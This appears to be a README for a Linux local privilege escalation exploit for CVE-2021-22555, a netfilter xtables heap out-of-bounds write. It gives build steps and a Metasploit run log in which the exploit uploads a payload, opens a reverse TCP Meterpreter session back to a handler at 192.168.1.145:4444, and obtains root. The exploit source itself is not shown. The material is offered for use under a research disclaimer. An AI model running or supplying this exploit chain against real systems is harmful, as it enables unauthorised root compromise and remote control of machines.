42 lines
1.5 KiB
Markdown
42 lines
1.5 KiB
Markdown
# Netfilter_xtables_Heap_OOB_Write_Privilege_Escalation_CVE-2021-22555
|
|
|
|
LPE exploit for CVE-2021-22555. Tested on Ubuntu 20.04 kernel 5.8.0-48-generic.
|
|
The vulnerability was discovered by Andy Nguyen [@theflow0](https://twitter.com/theflow0).
|
|
|
|
Author: [Szymon Janusz](https://github.com/szymonj99)
|
|
|
|
For educational/research purposes only. Use at your own risk.
|
|
|
|
## Usage:
|
|
|
|
The exploit binary **must** be built on a Linux environment as it relies on Linux header files.
|
|
|
|
To build:
|
|
```
|
|
make ubuntu
|
|
```
|
|
|
|
To run:
|
|
```
|
|
msf6 exploit(linux/local/netfilter_xtables_heap_oob_write_priv_esc) > run
|
|
|
|
[*] Started reverse TCP handler on 192.168.1.145:4444
|
|
[*] Running automatic check ("set AutoCheck false" to disable)
|
|
[+] The target appears to be vulnerable. Target is running kernel release 5.8.0-48-generic.
|
|
[*] Dropping pre-compiled binaries to system...
|
|
[*] Writing '/var/tmp/flTJOaqhI' (734660 bytes) ...
|
|
[*] Uploading payload...
|
|
[*] Writing '/var/tmp/ckaFBkiL' (250 bytes) ...
|
|
[*] Running payload on remote system...
|
|
[*] Sending stage (3012548 bytes) to 192.168.1.67
|
|
[+] Deleted /var/tmp/flTJOaqhI
|
|
[+] Deleted /var/tmp/ckaFBkiL
|
|
[*] Meterpreter session 2 opened (192.168.1.145:4444 -> 192.168.1.67:43322) at 2021-09-28 14:20:41 +0100
|
|
[*] Payload executed!
|
|
|
|
meterpreter > getuid
|
|
Server username: root @ ubuntu-virtual-machine (uid=0, gid=0, euid=0, egid=0)
|
|
```
|
|
|
|
Checkout the writeup [CVE-2021-22555: Turning \x00\x00 into 10000$](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html).
|